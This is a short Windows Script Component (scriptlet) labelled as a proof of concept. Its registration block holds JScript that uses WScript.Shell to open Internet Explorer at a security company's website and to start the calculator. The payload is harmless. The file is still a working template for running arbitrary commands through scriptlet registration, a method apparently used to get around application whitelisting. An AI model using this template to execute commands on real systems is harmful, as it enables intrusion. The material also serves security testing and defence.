<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0002222-0000-0000-0000-0000ADECBCDA}" >
	<script language="JScript">
		<![CDATA[
	
			var c = new ActiveXObject("WScript.Shell");
			c.Run("iexplore.exe www.nsideattacklogic.de");
			
			var d = new ActiveXObject("WScript.Shell");
			d.Run("calc.exe");
	
		]]>
</script>
</registration>
</scriptlet>
